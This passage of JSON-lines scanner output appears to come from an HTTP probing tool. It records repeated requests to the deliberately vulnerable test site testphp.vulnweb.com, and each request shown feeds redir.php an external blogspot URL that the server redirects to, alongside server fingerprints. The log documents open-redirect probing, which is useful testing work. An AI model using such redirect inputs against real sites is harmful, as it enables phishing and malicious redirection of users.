her\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.384177493Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://gdfswaw.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://gdfswaw.blogspot.com\",\"location\":\"http://gdfswaw.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://gdfswaw.blogspot.com\",\"time\":\"355.501967ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.448497794Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geocadmd8.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geocadmd8.blogspot.com/\",\"location\":\"http://geocadmd8.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geocadmd8.blogspot.com/\",\"time\":\"346.878285ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:21.547191106Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geocadmd8.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geocadmd8.blogspot.com/management.html\",\"location\":\"http://geocadmd8.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geocadmd8.blogspot.com/management.html\",\"time\":\"343.221891ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:24.74722238Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geocalre.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geocalre.blogspot.com/\",\"location\":\"http://geocalre.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geocalre.blogspot.com/\",\"time\":\"342.446802ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:24.918001428Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geocalre.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geocalre.blogspot.com/management.html\",\"location\":\"http://geocalre.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geocalre.blogspot.com/management.html\",\"time\":\"350.942527ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:24.985498674Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geodisci.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geodisci.blogspot.com/\",\"location\":\"http://geodisci.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geodisci.blogspot.com/\",\"time\":\"346.94746ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:25.034078971Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geodisci.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geodisci.blogspot.com/management.html\",\"location\":\"http://geodisci.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geodisci.blogspot.com/management.html\",\"time\":\"350.645759ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:25.404780243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geoffmairvc.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geoffmairvc.blogspot.com/\",\"location\":\"http://geoffmairvc.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geoffmairvc.blogspot.com/\",\"time\":\"342.976382ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:25.809089753Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geoffmairvc.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geoffmairvc.blogspot.com/management.html\",\"location\":\"http://geoffmairvc.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geoffmairvc.blogspot.com/management.html\",\"time\":\"353.152041ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:25.840289418Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geogreenhouseis.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geogreenhouseis.blogspot.com/\",\"location\":\"http://geogreenhouseis.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geogreenhouseis.blogspot.com/\",\"time\":\"348.892684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:26.034845248Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geogreenhouseis.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geogreenhouseis.blogspot.com/management.html\",\"location\":\"http://geogreenhouseis.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geogreenhouseis.blogspot.com/management.html\",\"time\":\"344.282704ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:26.574783693Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geomasterqa.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geomasterqa.blogspot.com/\",\"location\":\"http://geomasterqa.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geomasterqa.blogspot.com/\",\"time\":\"353.276471ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:26.624770675Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geomasterqa.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geomasterqa.blogspot.com/management.html\",\"location\":\"http://geomasterqa.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geomasterqa.blogspot.com/management.html\",\"time\":\"351.6846ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:28.289302269Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geonewscc.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geonewscc.blogspot.com/\",\"location\":\"http://geonewscc.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geonewscc.blogspot.com/\",\"time\":\"343.440332ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:29.594795097Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geonewscc.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geonewscc.blogspot.com/management.html\",\"location\":\"http://geonewscc.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geonewscc.blogspot.com/management.html\",\"time\":\"344.358165ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:29.652323603Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georganicsis.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georganicsis.blogspot.com/\",\"location\":\"http://georganicsis.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georganicsis.blogspot.com/\",\"time\":\"353.890151ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:29.978260828Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georganicsis.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georganicsis.blogspot.com/management.html\",\"location\":\"http://georganicsis.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georganicsis.blogspot.com/management.html\",\"time\":\"360.601183ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:30.83857211Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeclevelandcom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeclevelandcom.blogspot.com/\",\"location\":\"http://georgeclevelandcom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgeclevelandcom.blogspot.com/\",\"time\":\"352.777891ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:30.856714063Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeclevelandcom.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeclevelandcom.blogspot.com/management.html\",\"location\":\"http://georgeclevelandcom.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgeclevelandcom.blogspot.com/management.html\",\"time\":\"344.595305ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:30.908442757Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeeeeeeeeeeeeeam.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeeeeeeeeeeeeeam.blogspot.com/\",\"location\":\"http://georgeeeeeeeeeeeeeam.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgeeeeeeeeeeeeeam.blogspot.com/\",\"time\":\"351.826436ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:30.91061572Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeeeeeeeeeeeeeam.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgeeeeeeeeeeeeeam.blogspot.com/management.html\",\"location\":\"http://georgeeeeeeeeeeeeeam.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgeeeeeeeeeeeeeam.blogspot.com/management.html\",\"time\":\"344.047149ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.202724368Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgehotelim.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgehotelim.blogspot.com/\",\"location\":\"http://georgehotelim.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgehotelim.blogspot.com/\",\"time\":\"351.776184ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.261396572Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgehotelim.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgehotelim.blogspot.com/management.html\",\"location\":\"http://georgehotelim.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgehotelim.blogspot.com/management.html\",\"time\":\"342.984982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.288415372Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiaheritagebankcom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiaheritagebankcom.blogspot.com/\",\"location\":\"http://georgiaheritagebankcom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgiaheritagebankcom.blogspot.com/\",\"time\":\"352.724412ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.359242215Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiaheritagebankcom.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiaheritagebankcom.blogspot.com/management.html\",\"location\":\"http://georgiaheritagebankcom.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgiaheritagebankcom.blogspot.com/management.html\",\"time\":\"355.037401ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.388438001Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiamorningcom.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiamorningcom.blogspot.com/\",\"location\":\"http://georgiamorningcom.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgiamorningcom.blogspot.com/\",\"time\":\"342.653705ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.494930157Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiamorningcom.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgiamorningcom.blogspot.com/management.html\",\"location\":\"http://georgiamorningcom.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgiamorningcom.blogspot.com/management.html\",\"time\":\"354.265057ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.546947603Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgievskimk.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgievskimk.blogspot.com/\",\"location\":\"http://georgievskimk.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgievskimk.blogspot.com/\",\"time\":\"342.915898ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.607071263Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georgievskimk.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georgievskimk.blogspot.com/management.html\",\"location\":\"http://georgievskimk.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georgievskimk.blogspot.com/management.html\",\"time\":\"356.46404ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.648750349Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georis85.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georis85.blogspot.com/\",\"location\":\"http://georis85.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georis85.blogspot.com/\",\"time\":\"358.417097ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.725608007Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://georis85.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://georis85.blogspot.com/management.html\",\"location\":\"http://georis85.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://georis85.blogspot.com/management.html\",\"time\":\"339.390225ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.806452589Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geotextilemd.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geotextilemd.blogspot.com/\",\"location\":\"http://geotextilemd.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geotextilemd.blogspot.com/\",\"time\":\"355.399603ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:31.905519237Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geotextilemd.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geotextilemd.blogspot.com/management.html\",\"location\":\"http://geotextilemd.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geotextilemd.blogspot.com/management.html\",\"time\":\"356.637216ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:35.092340914Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geotouram.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geotouram.blogspot.com/\",\"location\":\"http://geotouram.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geotouram.blogspot.com/\",\"time\":\"342.714098ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:35.271207315Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geowashci.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geowashci.blogspot.com/\",\"location\":\"http://geowashci.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geowashci.blogspot.com/\",\"time\":\"350.955553ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:28:35.330748696Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://geowashci.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://geowashci.blogspot.com/management.html\",\"location\":\"http://geowashci.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://geowashci.blogspot.com/management.html\",\"time\":\"343.312227ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgeba